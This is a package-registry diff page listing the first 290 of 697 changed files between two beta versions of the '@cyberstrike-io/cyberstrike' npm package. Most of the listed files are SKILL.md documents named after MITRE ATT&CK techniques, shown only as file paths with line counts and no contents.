@cyberstrike-io/cyberstrike 1.1.10-beta.3 → 1.1.10-beta.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (697) hide show
  1. package/package.json +2 -2
  2. package/skill/T1558.003_kerberoasting_DEMO.md +93 -0
  3. package/skill/mitre_attack/TA0001_initial-access/T1189_drive-by-compromise/SKILL.md +7 -4
  4. package/skill/mitre_attack/TA0001_initial-access/T1190_exploit-public-facing-application/SKILL.md +7 -4
  5. package/skill/mitre_attack/TA0001_initial-access/T1195.001_compromise-software-dependencies-and-development-tools/SKILL.md +7 -4
  6. package/skill/mitre_attack/TA0001_initial-access/T1195.002_compromise-software-supply-chain/SKILL.md +25 -4
  7. package/skill/mitre_attack/TA0001_initial-access/T1195.003_compromise-hardware-supply-chain/SKILL.md +7 -4
  8. package/skill/mitre_attack/TA0001_initial-access/T1195_supply-chain-compromise/SKILL.md +28 -4
  9. package/skill/mitre_attack/TA0001_initial-access/T1199_trusted-relationship/SKILL.md +7 -4
  10. package/skill/mitre_attack/TA0001_initial-access/T1200_hardware-additions/SKILL.md +7 -4
  11. package/skill/mitre_attack/TA0001_initial-access/T1566.001_spearphishing-attachment/SKILL.md +42 -4
  12. package/skill/mitre_attack/TA0001_initial-access/T1566.002_spearphishing-link/SKILL.md +49 -4
  13. package/skill/mitre_attack/TA0001_initial-access/T1566.003_spearphishing-via-service/SKILL.md +7 -4
  14. package/skill/mitre_attack/TA0001_initial-access/T1566.004_spearphishing-voice/SKILL.md +7 -4
  15. package/skill/mitre_attack/TA0001_initial-access/T1566_phishing/SKILL.md +7 -4
  16. package/skill/mitre_attack/TA0001_initial-access/T1659_content-injection/SKILL.md +53 -4
  17. package/skill/mitre_attack/TA0001_initial-access/T1669_wi-fi-networks/SKILL.md +7 -4
  18. package/skill/mitre_attack/TA0002_execution/T1047_windows-management-instrumentation/SKILL.md +70 -4
  19. package/skill/mitre_attack/TA0002_execution/T1053.002_at/SKILL.md +39 -4
  20. package/skill/mitre_attack/TA0002_execution/T1053.003_cron/SKILL.md +59 -4
  21. package/skill/mitre_attack/TA0002_execution/T1053.005_scheduled-task/SKILL.md +80 -4
  22. package/skill/mitre_attack/TA0002_execution/T1053.006_systemd-timers/SKILL.md +67 -4
  23. package/skill/mitre_attack/TA0002_execution/T1053.007_container-orchestration-job/SKILL.md +38 -4
  24. package/skill/mitre_attack/TA0002_execution/T1053_scheduled-taskjob/SKILL.md +7 -4
  25. package/skill/mitre_attack/TA0002_execution/T1059.001_powershell/SKILL.md +79 -4
  26. package/skill/mitre_attack/TA0002_execution/T1059.002_applescript/SKILL.md +25 -4
  27. package/skill/mitre_attack/TA0002_execution/T1059.003_windows-command-shell/SKILL.md +74 -4
  28. package/skill/mitre_attack/TA0002_execution/T1059.004_unix-shell/SKILL.md +78 -4
  29. package/skill/mitre_attack/TA0002_execution/T1059.005_visual-basic/SKILL.md +63 -4
  30. package/skill/mitre_attack/TA0002_execution/T1059.006_python/SKILL.md +92 -4
  31. package/skill/mitre_attack/TA0002_execution/T1059.007_javascript/SKILL.md +38 -4
  32. package/skill/mitre_attack/TA0002_execution/T1059.008_network-device-cli/SKILL.md +7 -4
  33. package/skill/mitre_attack/TA0002_execution/T1059.009_cloud-api/SKILL.md +7 -4
  34. package/skill/mitre_attack/TA0002_execution/T1059.010_autohotkey-autoit/SKILL.md +25 -4
  35. package/skill/mitre_attack/TA0002_execution/T1059.011_lua/SKILL.md +7 -4
  36. package/skill/mitre_attack/TA0002_execution/T1059.012_hypervisor-cli/SKILL.md +7 -4
  37. package/skill/mitre_attack/TA0002_execution/T1059.013_container-cliapi/SKILL.md +7 -4
  38. package/skill/mitre_attack/TA0002_execution/T1059_command-and-scripting-interpreter/SKILL.md +25 -4
  39. package/skill/mitre_attack/TA0002_execution/T1072_software-deployment-tools/SKILL.md +54 -4
  40. package/skill/mitre_attack/TA0002_execution/T1106_native-api/SKILL.md +75 -4
  41. package/skill/mitre_attack/TA0002_execution/T1129_shared-modules/SKILL.md +27 -4
  42. package/skill/mitre_attack/TA0002_execution/T1203_exploitation-for-client-execution/SKILL.md +7 -4
  43. package/skill/mitre_attack/TA0002_execution/T1204.001_malicious-link/SKILL.md +7 -4
  44. package/skill/mitre_attack/TA0002_execution/T1204.002_malicious-file/SKILL.md +93 -4
  45. package/skill/mitre_attack/TA0002_execution/T1204.003_malicious-image/SKILL.md +7 -4
  46. package/skill/mitre_attack/TA0002_execution/T1204.004_malicious-copy-and-paste/SKILL.md +7 -4
  47. package/skill/mitre_attack/TA0002_execution/T1204.005_malicious-library/SKILL.md +7 -4
  48. package/skill/mitre_attack/TA0002_execution/T1204_user-execution/SKILL.md +7 -4
  49. package/skill/mitre_attack/TA0002_execution/T1559.001_component-object-model/SKILL.md +7 -4
  50. package/skill/mitre_attack/TA0002_execution/T1559.002_dynamic-data-exchange/SKILL.md +40 -4
  51. package/skill/mitre_attack/TA0002_execution/T1559.003_xpc-services/SKILL.md +7 -4
  52. package/skill/mitre_attack/TA0002_execution/T1559_inter-process-communication/SKILL.md +87 -4
  53. package/skill/mitre_attack/TA0002_execution/T1569.001_launchctl/SKILL.md +22 -4
  54. package/skill/mitre_attack/TA0002_execution/T1569.002_service-execution/SKILL.md +81 -4
  55. package/skill/mitre_attack/TA0002_execution/T1569.003_systemctl/SKILL.md +169 -4
  56. package/skill/mitre_attack/TA0002_execution/T1569_system-services/SKILL.md +7 -4
  57. package/skill/mitre_attack/TA0002_execution/T1609_container-administration-command/SKILL.md +43 -4
  58. package/skill/mitre_attack/TA0002_execution/T1648_serverless-execution/SKILL.md +7 -4
  59. package/skill/mitre_attack/TA0002_execution/T1651_cloud-administration-command/SKILL.md +7 -4
  60. package/skill/mitre_attack/TA0002_execution/T1674_input-injection/SKILL.md +7 -4
  61. package/skill/mitre_attack/TA0002_execution/T1675_esxi-administration-command/SKILL.md +7 -4
  62. package/skill/mitre_attack/TA0002_execution/T1677_poisoned-pipeline-execution/SKILL.md +7 -4
  63. package/skill/mitre_attack/TA0003_persistence/T1037.001_logon-script-windows/SKILL.md +24 -4
  64. package/skill/mitre_attack/TA0003_persistence/T1037.002_login-hook/SKILL.md +18 -4
  65. package/skill/mitre_attack/TA0003_persistence/T1037.003_network-logon-script/SKILL.md +7 -4
  66. package/skill/mitre_attack/TA0003_persistence/T1037.004_rc-scripts/SKILL.md +55 -4
  67. package/skill/mitre_attack/TA0003_persistence/T1037.005_startup-items/SKILL.md +64 -4
  68. package/skill/mitre_attack/TA0003_persistence/T1037_boot-or-logon-initialization-scripts/SKILL.md +7 -4
  69. package/skill/mitre_attack/TA0003_persistence/T1098.001_additional-cloud-credentials/SKILL.md +8 -4
  70. package/skill/mitre_attack/TA0003_persistence/T1098.002_additional-email-delegate-permissions/SKILL.md +7 -4
  71. package/skill/mitre_attack/TA0003_persistence/T1098.003_additional-cloud-roles/SKILL.md +7 -4
  72. package/skill/mitre_attack/TA0003_persistence/T1098.004_ssh-authorized-keys/SKILL.md +23 -4
  73. package/skill/mitre_attack/TA0003_persistence/T1098.005_device-registration/SKILL.md +7 -4
  74. package/skill/mitre_attack/TA0003_persistence/T1098.006_additional-container-cluster-roles/SKILL.md +7 -4
  75. package/skill/mitre_attack/TA0003_persistence/T1098.007_additional-local-or-domain-groups/SKILL.md +7 -4
  76. package/skill/mitre_attack/TA0003_persistence/T1098_account-manipulation/SKILL.md +71 -4
  77. package/skill/mitre_attack/TA0003_persistence/T1133_external-remote-services/SKILL.md +32 -4
  78. package/skill/mitre_attack/TA0003_persistence/T1136.001_local-account/SKILL.md +74 -4
  79. package/skill/mitre_attack/TA0003_persistence/T1136.002_domain-account/SKILL.md +85 -4
  80. package/skill/mitre_attack/TA0003_persistence/T1136.003_cloud-account/SKILL.md +7 -4
  81. package/skill/mitre_attack/TA0003_persistence/T1136_create-account/SKILL.md +7 -4
  82. package/skill/mitre_attack/TA0003_persistence/T1137.001_office-template-macros/SKILL.md +102 -7
  83. package/skill/mitre_attack/TA0003_persistence/T1137.002_office-test/SKILL.md +38 -4
  84. package/skill/mitre_attack/TA0003_persistence/T1137.003_outlook-forms/SKILL.md +7 -4
  85. package/skill/mitre_attack/TA0003_persistence/T1137.004_outlook-home-page/SKILL.md +24 -4
  86. package/skill/mitre_attack/TA0003_persistence/T1137.005_outlook-rules/SKILL.md +231 -4
  87. package/skill/mitre_attack/TA0003_persistence/T1137.006_add-ins/SKILL.md +130 -4
  88. package/skill/mitre_attack/TA0003_persistence/T1137_office-application-startup/SKILL.md +28 -4
  89. package/skill/mitre_attack/TA0003_persistence/T1176.001_browser-extensions/SKILL.md +7 -4
  90. package/skill/mitre_attack/TA0003_persistence/T1176.002_ide-extensions/SKILL.md +7 -4
  91. package/skill/mitre_attack/TA0003_persistence/T1176_software-extensions/SKILL.md +61 -4
  92. package/skill/mitre_attack/TA0003_persistence/T1505.001_sql-stored-procedures/SKILL.md +7 -4
  93. package/skill/mitre_attack/TA0003_persistence/T1505.002_transport-agent/SKILL.md +29 -4
  94. package/skill/mitre_attack/TA0003_persistence/T1505.003_web-shell/SKILL.md +27 -4
  95. package/skill/mitre_attack/TA0003_persistence/T1505.004_iis-components/SKILL.md +46 -4
  96. package/skill/mitre_attack/TA0003_persistence/T1505.005_terminal-services-dll/SKILL.md +66 -4
  97. package/skill/mitre_attack/TA0003_persistence/T1505.006_vsphere-installation-bundles/SKILL.md +7 -4
  98. package/skill/mitre_attack/TA0003_persistence/T1505_server-software-component/SKILL.md +7 -4
  99. package/skill/mitre_attack/TA0003_persistence/T1525_implant-internal-image/SKILL.md +7 -4
  100. package/skill/mitre_attack/TA0003_persistence/T1542.001_system-firmware/SKILL.md +27 -4
  101. package/skill/mitre_attack/TA0003_persistence/T1542.002_component-firmware/SKILL.md +7 -4
  102. package/skill/mitre_attack/TA0003_persistence/T1542.003_bootkit/SKILL.md +7 -4
  103. package/skill/mitre_attack/TA0003_persistence/T1543.001_launch-agent/SKILL.md +56 -4
  104. package/skill/mitre_attack/TA0003_persistence/T1543.002_systemd-service/SKILL.md +106 -7
  105. package/skill/mitre_attack/TA0003_persistence/T1543.003_windows-service/SKILL.md +93 -4
  106. package/skill/mitre_attack/TA0003_persistence/T1543.004_launch-daemon/SKILL.md +27 -4
  107. package/skill/mitre_attack/TA0003_persistence/T1543.005_container-service/SKILL.md +7 -4
  108. package/skill/mitre_attack/TA0003_persistence/T1543_create-or-modify-system-process/SKILL.md +7 -4
  109. package/skill/mitre_attack/TA0003_persistence/T1546.017_udev-rules/SKILL.md +7 -4
  110. package/skill/mitre_attack/TA0003_persistence/T1546.018_python-startup-hooks/SKILL.md +110 -4
  111. package/skill/mitre_attack/TA0003_persistence/T1547.001_registry-run-keys-startup-folder/SKILL.md +83 -4
  112. package/skill/mitre_attack/TA0003_persistence/T1547.002_authentication-package/SKILL.md +27 -4
  113. package/skill/mitre_attack/TA0003_persistence/T1547.003_time-providers/SKILL.md +52 -4
  114. package/skill/mitre_attack/TA0003_persistence/T1547.004_winlogon-helper-dll/SKILL.md +78 -4
  115. package/skill/mitre_attack/TA0003_persistence/T1547.005_security-support-provider/SKILL.md +41 -4
  116. package/skill/mitre_attack/TA0003_persistence/T1547.006_kernel-modules-and-extensions/SKILL.md +67 -4
  117. package/skill/mitre_attack/TA0003_persistence/T1547.007_re-opened-applications/SKILL.md +57 -4
  118. package/skill/mitre_attack/TA0003_persistence/T1547.008_lsass-driver/SKILL.md +30 -4
  119. package/skill/mitre_attack/TA0003_persistence/T1547.009_shortcut-modification/SKILL.md +52 -4
  120. package/skill/mitre_attack/TA0003_persistence/T1547.010_port-monitors/SKILL.md +23 -4
  121. package/skill/mitre_attack/TA0003_persistence/T1547.012_print-processors/SKILL.md +35 -4
  122. package/skill/mitre_attack/TA0003_persistence/T1547.013_xdg-autostart-entries/SKILL.md +7 -4
  123. package/skill/mitre_attack/TA0003_persistence/T1547.014_active-setup/SKILL.md +60 -4
  124. package/skill/mitre_attack/TA0003_persistence/T1547.015_login-items/SKILL.md +28 -4
  125. package/skill/mitre_attack/TA0003_persistence/T1547_boot-or-logon-autostart-execution/SKILL.md +46 -4
  126. package/skill/mitre_attack/TA0003_persistence/T1554_compromise-host-software-binary/SKILL.md +7 -4
  127. package/skill/mitre_attack/TA0003_persistence/T1574.001_dll/SKILL.md +94 -4
  128. package/skill/mitre_attack/TA0003_persistence/T1574.004_dylib-hijacking/SKILL.md +7 -4
  129. package/skill/mitre_attack/TA0003_persistence/T1574.005_executable-installer-file-permissions-weakness/SKILL.md +7 -4
  130. package/skill/mitre_attack/TA0003_persistence/T1574.006_dynamic-linker-hijacking/SKILL.md +56 -4
  131. package/skill/mitre_attack/TA0003_persistence/T1574.007_path-interception-by-path-environment-variable/SKILL.md +7 -4
  132. package/skill/mitre_attack/TA0003_persistence/T1574.008_path-interception-by-search-order-hijacking/SKILL.md +25 -4
  133. package/skill/mitre_attack/TA0003_persistence/T1574.009_path-interception-by-unquoted-path/SKILL.md +28 -4
  134. package/skill/mitre_attack/TA0003_persistence/T1574.010_services-file-permissions-weakness/SKILL.md +7 -4
  135. package/skill/mitre_attack/TA0003_persistence/T1574.011_services-registry-permissions-weakness/SKILL.md +37 -4
  136. package/skill/mitre_attack/TA0003_persistence/T1574.012_corprofiler/SKILL.md +77 -4
  137. package/skill/mitre_attack/TA0003_persistence/T1574.013_kernelcallbacktable/SKILL.md +7 -4
  138. package/skill/mitre_attack/TA0003_persistence/T1574.014_appdomainmanager/SKILL.md +7 -4
  139. package/skill/mitre_attack/TA0003_persistence/T1574_hijack-execution-flow/SKILL.md +7 -4
  140. package/skill/mitre_attack/TA0003_persistence/T1653_power-settings/SKILL.md +7 -4
  141. package/skill/mitre_attack/TA0003_persistence/T1668_exclusive-control/SKILL.md +7 -4
  142. package/skill/mitre_attack/TA0003_persistence/T1671_cloud-application-integration/SKILL.md +7 -4
  143. package/skill/mitre_attack/TA0004_privilege-escalation/T1068_exploitation-for-privilege-escalation/SKILL.md +7 -4
  144. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.001_change-default-file-association/SKILL.md +25 -4
  145. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.002_screensaver/SKILL.md +29 -4
  146. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.003_windows-management-instrumentation-event-subscription/SKILL.md +96 -4
  147. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.004_unix-shell-configuration-modification/SKILL.md +63 -4
  148. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.005_trap/SKILL.md +62 -4
  149. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.006_lcloaddylib-addition/SKILL.md +7 -4
  150. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.007_netsh-helper-dll/SKILL.md +31 -4
  151. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.008_accessibility-features/SKILL.md +97 -4
  152. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.009_appcert-dlls/SKILL.md +32 -4
  153. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.010_appinit-dlls/SKILL.md +32 -4
  154. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.011_application-shimming/SKILL.md +60 -4
  155. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.012_image-file-execution-options-injection/SKILL.md +63 -4
  156. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.013_powershell-profile/SKILL.md +27 -4
  157. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.014_emond/SKILL.md +24 -4
  158. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.015_component-object-model-hijacking/SKILL.md +95 -4
  159. package/skill/mitre_attack/TA0004_privilege-escalation/T1546.016_installer-packages/SKILL.md +7 -4
  160. package/skill/mitre_attack/TA0004_privilege-escalation/T1546_event-triggered-execution/SKILL.md +104 -4
  161. package/skill/mitre_attack/TA0004_privilege-escalation/T1548.001_setuid-and-setgid/SKILL.md +83 -4
  162. package/skill/mitre_attack/TA0004_privilege-escalation/T1548.002_bypass-user-account-control/SKILL.md +78 -4
  163. package/skill/mitre_attack/TA0004_privilege-escalation/T1548.003_sudo-and-sudo-caching/SKILL.md +80 -4
  164. package/skill/mitre_attack/TA0004_privilege-escalation/T1548.004_elevated-execution-with-prompt/SKILL.md +7 -4
  165. package/skill/mitre_attack/TA0004_privilege-escalation/T1548.005_temporary-elevated-cloud-access/SKILL.md +7 -4
  166. package/skill/mitre_attack/TA0004_privilege-escalation/T1548_abuse-elevation-control-mechanism/SKILL.md +7 -4
  167. package/skill/mitre_attack/TA0004_privilege-escalation/T1611_escape-to-host/SKILL.md +78 -4
  168. package/skill/mitre_attack/TA0005_defense-evasion/T1006_direct-volume-access/SKILL.md +35 -4
  169. package/skill/mitre_attack/TA0005_defense-evasion/T1014_rootkit/SKILL.md +73 -4
  170. package/skill/mitre_attack/TA0005_defense-evasion/T1027.001_binary-padding/SKILL.md +44 -4
  171. package/skill/mitre_attack/TA0005_defense-evasion/T1027.002_software-packing/SKILL.md +60 -4
  172. package/skill/mitre_attack/TA0005_defense-evasion/T1027.003_steganography/SKILL.md +7 -4
  173. package/skill/mitre_attack/TA0005_defense-evasion/T1027.004_compile-after-delivery/SKILL.md +83 -4
  174. package/skill/mitre_attack/TA0005_defense-evasion/T1027.005_indicator-removal-from-tools/SKILL.md +7 -4
  175. package/skill/mitre_attack/TA0005_defense-evasion/T1027.006_html-smuggling/SKILL.md +26 -4
  176. package/skill/mitre_attack/TA0005_defense-evasion/T1027.007_dynamic-api-resolution/SKILL.md +28 -4
  177. package/skill/mitre_attack/TA0005_defense-evasion/T1027.008_stripped-payloads/SKILL.md +7 -4
  178. package/skill/mitre_attack/TA0005_defense-evasion/T1027.009_embedded-payloads/SKILL.md +7 -4
  179. package/skill/mitre_attack/TA0005_defense-evasion/T1027.010_command-obfuscation/SKILL.md +7 -4
  180. package/skill/mitre_attack/TA0005_defense-evasion/T1027.011_fileless-storage/SKILL.md +7 -4
  181. package/skill/mitre_attack/TA0005_defense-evasion/T1027.012_lnk-icon-smuggling/SKILL.md +7 -4
  182. package/skill/mitre_attack/TA0005_defense-evasion/T1027.013_encryptedencoded-file/SKILL.md +68 -4
  183. package/skill/mitre_attack/TA0005_defense-evasion/T1027.014_polymorphic-code/SKILL.md +7 -4
  184. package/skill/mitre_attack/TA0005_defense-evasion/T1027.015_compression/SKILL.md +7 -4
  185. package/skill/mitre_attack/TA0005_defense-evasion/T1027.016_junk-code-insertion/SKILL.md +7 -4
  186. package/skill/mitre_attack/TA0005_defense-evasion/T1027.017_svg-smuggling/SKILL.md +7 -4
  187. package/skill/mitre_attack/TA0005_defense-evasion/T1027_obfuscated-files-or-information/SKILL.md +89 -4
  188. package/skill/mitre_attack/TA0005_defense-evasion/T1036.001_invalid-code-signature/SKILL.md +7 -4
  189. package/skill/mitre_attack/TA0005_defense-evasion/T1036.002_right-to-left-override/SKILL.md +7 -4
  190. package/skill/mitre_attack/TA0005_defense-evasion/T1036.003_rename-legitimate-utilities/SKILL.md +80 -4
  191. package/skill/mitre_attack/TA0005_defense-evasion/T1036.004_masquerade-task-or-service/SKILL.md +66 -4
  192. package/skill/mitre_attack/TA0005_defense-evasion/T1036.005_match-legitimate-resource-name-or-location/SKILL.md +76 -4
  193. package/skill/mitre_attack/TA0005_defense-evasion/T1036.006_space-after-filename/SKILL.md +33 -4
  194. package/skill/mitre_attack/TA0005_defense-evasion/T1036.007_double-file-extension/SKILL.md +45 -4
  195. package/skill/mitre_attack/TA0005_defense-evasion/T1036.008_masquerade-file-type/SKILL.md +7 -4
  196. package/skill/mitre_attack/TA0005_defense-evasion/T1036.009_break-process-trees/SKILL.md +7 -4
  197. package/skill/mitre_attack/TA0005_defense-evasion/T1036.010_masquerade-account-name/SKILL.md +7 -4
  198. package/skill/mitre_attack/TA0005_defense-evasion/T1036.011_overwrite-process-arguments/SKILL.md +7 -4
  199. package/skill/mitre_attack/TA0005_defense-evasion/T1036.012_browser-fingerprint/SKILL.md +7 -4
  200. package/skill/mitre_attack/TA0005_defense-evasion/T1036_masquerading/SKILL.md +40 -4
  201. package/skill/mitre_attack/TA0005_defense-evasion/T1055.001_dynamic-link-library-injection/SKILL.md +41 -4
  202. package/skill/mitre_attack/TA0005_defense-evasion/T1055.002_portable-executable-injection/SKILL.md +28 -4
  203. package/skill/mitre_attack/TA0005_defense-evasion/T1055.003_thread-execution-hijacking/SKILL.md +25 -4
  204. package/skill/mitre_attack/TA0005_defense-evasion/T1055.004_asynchronous-procedure-call/SKILL.md +75 -4
  205. package/skill/mitre_attack/TA0005_defense-evasion/T1055.005_thread-local-storage/SKILL.md +7 -4
  206. package/skill/mitre_attack/TA0005_defense-evasion/T1055.008_ptrace-system-calls/SKILL.md +7 -4
  207. package/skill/mitre_attack/TA0005_defense-evasion/T1055.009_proc-memory/SKILL.md +7 -4
  208. package/skill/mitre_attack/TA0005_defense-evasion/T1055.011_extra-window-memory-injection/SKILL.md +25 -4
  209. package/skill/mitre_attack/TA0005_defense-evasion/T1055.012_process-hollowing/SKILL.md +67 -4
  210. package/skill/mitre_attack/TA0005_defense-evasion/T1055.013_process-doppelgnging/SKILL.md +7 -4
  211. package/skill/mitre_attack/TA0005_defense-evasion/T1055.014_vdso-hijacking/SKILL.md +7 -4
  212. package/skill/mitre_attack/TA0005_defense-evasion/T1055.015_listplanting/SKILL.md +28 -4
  213. package/skill/mitre_attack/TA0005_defense-evasion/T1055_process-injection/SKILL.md +96 -4
  214. package/skill/mitre_attack/TA0005_defense-evasion/T1070.001_clear-windows-event-logs/SKILL.md +56 -4
  215. package/skill/mitre_attack/TA0005_defense-evasion/T1070.002_clear-linux-or-mac-system-logs/SKILL.md +77 -4
  216. package/skill/mitre_attack/TA0005_defense-evasion/T1070.003_clear-command-history/SKILL.md +62 -4
  217. package/skill/mitre_attack/TA0005_defense-evasion/T1070.004_file-deletion/SKILL.md +79 -4
  218. package/skill/mitre_attack/TA0005_defense-evasion/T1070.005_network-share-connection-removal/SKILL.md +74 -4
  219. package/skill/mitre_attack/TA0005_defense-evasion/T1070.006_timestomp/SKILL.md +83 -4
  220. package/skill/mitre_attack/TA0005_defense-evasion/T1070.007_clear-network-connection-history-and-configurations/SKILL.md +7 -4
  221. package/skill/mitre_attack/TA0005_defense-evasion/T1070.008_clear-mailbox-data/SKILL.md +79 -4
  222. package/skill/mitre_attack/TA0005_defense-evasion/T1070.009_clear-persistence/SKILL.md +7 -4
  223. package/skill/mitre_attack/TA0005_defense-evasion/T1070.010_relocate-malware/SKILL.md +7 -4
  224. package/skill/mitre_attack/TA0005_defense-evasion/T1070_indicator-removal/SKILL.md +38 -4
  225. package/skill/mitre_attack/TA0005_defense-evasion/T1078.001_default-accounts/SKILL.md +51 -4
  226. package/skill/mitre_attack/TA0005_defense-evasion/T1078.002_domain-accounts/SKILL.md +7 -4
  227. package/skill/mitre_attack/TA0005_defense-evasion/T1078.003_local-accounts/SKILL.md +77 -4
  228. package/skill/mitre_attack/TA0005_defense-evasion/T1078.004_cloud-accounts/SKILL.md +7 -4
  229. package/skill/mitre_attack/TA0005_defense-evasion/T1078_valid-accounts/SKILL.md +7 -4
  230. package/skill/mitre_attack/TA0005_defense-evasion/T1112_modify-registry/SKILL.md +80 -4
  231. package/skill/mitre_attack/TA0005_defense-evasion/T1127.001_msbuild/SKILL.md +38 -4
  232. package/skill/mitre_attack/TA0005_defense-evasion/T1127.002_clickonce/SKILL.md +7 -4
  233. package/skill/mitre_attack/TA0005_defense-evasion/T1127.003_jamplus/SKILL.md +7 -4
  234. package/skill/mitre_attack/TA0005_defense-evasion/T1127_trusted-developer-utilities-proxy-execution/SKILL.md +44 -4
  235. package/skill/mitre_attack/TA0005_defense-evasion/T1134.001_token-impersonationtheft/SKILL.md +92 -4
  236. package/skill/mitre_attack/TA0005_defense-evasion/T1134.002_create-process-with-token/SKILL.md +39 -4
  237. package/skill/mitre_attack/TA0005_defense-evasion/T1134.003_make-and-impersonate-token/SKILL.md +7 -4
  238. package/skill/mitre_attack/TA0005_defense-evasion/T1134.004_parent-pid-spoofing/SKILL.md +84 -4
  239. package/skill/mitre_attack/TA0005_defense-evasion/T1134.005_sid-history-injection/SKILL.md +26 -4
  240. package/skill/mitre_attack/TA0005_defense-evasion/T1134_access-token-manipulation/SKILL.md +7 -4
  241. package/skill/mitre_attack/TA0005_defense-evasion/T1140_deobfuscatedecode-files-or-information/SKILL.md +89 -4
  242. package/skill/mitre_attack/TA0005_defense-evasion/T1197_bits-jobs/SKILL.md +67 -4
  243. package/skill/mitre_attack/TA0005_defense-evasion/T1202_indirect-command-execution/SKILL.md +87 -4
  244. package/skill/mitre_attack/TA0005_defense-evasion/T1205.001_port-knocking/SKILL.md +7 -4
  245. package/skill/mitre_attack/TA0005_defense-evasion/T1205.002_socket-filters/SKILL.md +7 -4
  246. package/skill/mitre_attack/TA0005_defense-evasion/T1205_traffic-signaling/SKILL.md +7 -4
  247. package/skill/mitre_attack/TA0005_defense-evasion/T1207_rogue-domain-controller/SKILL.md +56 -4
  248. package/skill/mitre_attack/TA0005_defense-evasion/T1211_exploitation-for-defense-evasion/SKILL.md +7 -4
  249. package/skill/mitre_attack/TA0005_defense-evasion/T1216.001_pubprn/SKILL.md +22 -4
  250. package/skill/mitre_attack/TA0005_defense-evasion/T1216.002_syncappvpublishingserver/SKILL.md +7 -4
  251. package/skill/mitre_attack/TA0005_defense-evasion/T1216_system-script-proxy-execution/SKILL.md +34 -4
  252. package/skill/mitre_attack/TA0005_defense-evasion/T1218.001_compiled-html-file/SKILL.md +76 -4
  253. package/skill/mitre_attack/TA0005_defense-evasion/T1218.002_control-panel/SKILL.md +26 -4
  254. package/skill/mitre_attack/TA0005_defense-evasion/T1218.003_cmstp/SKILL.md +38 -4
  255. package/skill/mitre_attack/TA0005_defense-evasion/T1218.004_installutil/SKILL.md +202 -4
  256. package/skill/mitre_attack/TA0005_defense-evasion/T1218.005_mshta/SKILL.md +75 -4
  257. package/skill/mitre_attack/TA0005_defense-evasion/T1218.007_msiexec/SKILL.md +77 -4
  258. package/skill/mitre_attack/TA0005_defense-evasion/T1218.008_odbcconf/SKILL.md +40 -4
  259. package/skill/mitre_attack/TA0005_defense-evasion/T1218.009_regsvcsregasm/SKILL.md +45 -4
  260. package/skill/mitre_attack/TA0005_defense-evasion/T1218.010_regsvr32/SKILL.md +75 -4
  261. package/skill/mitre_attack/TA0005_defense-evasion/T1218.011_rundll32/SKILL.md +80 -4
  262. package/skill/mitre_attack/TA0005_defense-evasion/T1218.012_verclsid/SKILL.md +7 -4
  263. package/skill/mitre_attack/TA0005_defense-evasion/T1218.013_mavinject/SKILL.md +7 -4
  264. package/skill/mitre_attack/TA0005_defense-evasion/T1218.014_mmc/SKILL.md +7 -4
  265. package/skill/mitre_attack/TA0005_defense-evasion/T1218.015_electron-applications/SKILL.md +7 -4
  266. package/skill/mitre_attack/TA0005_defense-evasion/T1218_system-binary-proxy-execution/SKILL.md +81 -4
  267. package/skill/mitre_attack/TA0005_defense-evasion/T1220_xsl-script-processing/SKILL.md +69 -4
  268. package/skill/mitre_attack/TA0005_defense-evasion/T1221_template-injection/SKILL.md +25 -4
  269. package/skill/mitre_attack/TA0005_defense-evasion/T1222.001_windows-file-and-directory-permissions-modification/SKILL.md +87 -4
  270. package/skill/mitre_attack/TA0005_defense-evasion/T1222.002_linux-and-mac-file-and-directory-permissions-modification/SKILL.md +62 -4
  271. package/skill/mitre_attack/TA0005_defense-evasion/T1222_file-and-directory-permissions-modification/SKILL.md +51 -4
  272. package/skill/mitre_attack/TA0005_defense-evasion/T1480.001_environmental-keying/SKILL.md +7 -4
  273. package/skill/mitre_attack/TA0005_defense-evasion/T1480.002_mutual-exclusion/SKILL.md +7 -4
  274. package/skill/mitre_attack/TA0005_defense-evasion/T1480_execution-guardrails/SKILL.md +7 -4
  275. package/skill/mitre_attack/TA0005_defense-evasion/T1484.001_group-policy-modification/SKILL.md +44 -4
  276. package/skill/mitre_attack/TA0005_defense-evasion/T1484.002_trust-modification/SKILL.md +7 -4
  277. package/skill/mitre_attack/TA0005_defense-evasion/T1484_domain-or-tenant-policy-modification/SKILL.md +7 -4
  278. package/skill/mitre_attack/TA0005_defense-evasion/T1497.001_system-checks/SKILL.md +71 -4
  279. package/skill/mitre_attack/TA0005_defense-evasion/T1497.002_user-activity-based-checks/SKILL.md +7 -4
  280. package/skill/mitre_attack/TA0005_defense-evasion/T1497.003_time-based-checks/SKILL.md +23 -4
  281. package/skill/mitre_attack/TA0005_defense-evasion/T1497_virtualizationsandbox-evasion/SKILL.md +7 -4
  282. package/skill/mitre_attack/TA0005_defense-evasion/T1535_unusedunsupported-cloud-regions/SKILL.md +7 -4
  283. package/skill/mitre_attack/TA0005_defense-evasion/T1542.004_rommonkit/SKILL.md +7 -4
  284. package/skill/mitre_attack/TA0005_defense-evasion/T1542.005_tftp-boot/SKILL.md +7 -4
  285. package/skill/mitre_attack/TA0005_defense-evasion/T1542_pre-os-boot/SKILL.md +7 -4
  286. package/skill/mitre_attack/TA0005_defense-evasion/T1548.006_tcc-manipulation/SKILL.md +7 -4
  287. package/skill/mitre_attack/TA0005_defense-evasion/T1550.001_application-access-token/SKILL.md +7 -4
  288. package/skill/mitre_attack/TA0005_defense-evasion/T1550.002_pass-the-hash/SKILL.md +52 -4
  289. package/skill/mitre_attack/TA0005_defense-evasion/T1550.003_pass-the-ticket/SKILL.md +47 -4
  290. package/skill/mitre_attack/TA0005_defense-evasion/T1550.004_web-session-cookie/SKILL.md +7 -4
